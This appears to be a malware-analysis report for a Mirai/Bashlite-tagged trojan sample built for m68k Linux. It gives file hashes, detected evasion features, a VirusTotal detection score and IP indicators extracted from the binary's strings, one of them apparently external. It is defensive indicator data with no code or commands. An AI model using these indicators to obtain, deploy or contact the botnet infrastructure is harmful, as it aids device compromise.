c.m68k
First submission 2024-09-05 01:06:02
Last submission 2024-09-05 01:13:02
File details
File type: ELF 32-bit MSB executable, Motorola m68k, 68020, version 1 (SYSV), statically linked, stripped
Mime type: application/x-executable
File size: 135.08 KB (138320 bytes)
MD5: ddc1b960e6e8514934f4e1fc488d64d9
SHA1: 2b0c80c57b04956c0d3916cc8cc5e1a010f9cc81
SHA256: 65b126e31c5d791273b6f2f9dc78fdb0fbb93793d64ca4ab5ffafd5c14c61d49
File features detected
Is DLL
Packers
Anti Debug
Anti VM
Signed
XOR
OSINT Enrichments
Virus Total: 38/79 (VT report date: 2024-09-05 00:48:15)
Malware Type 1 | trojan |
Threat Type 3 | mirai bashlite expl |
URLs, FQDN and IP indicators 2
Strings analysis - Possible IPs found 3
5.59.248.92 |
127.0.0.1 |
192.168.0.100 |
Strings analysis - Possible URLs found 13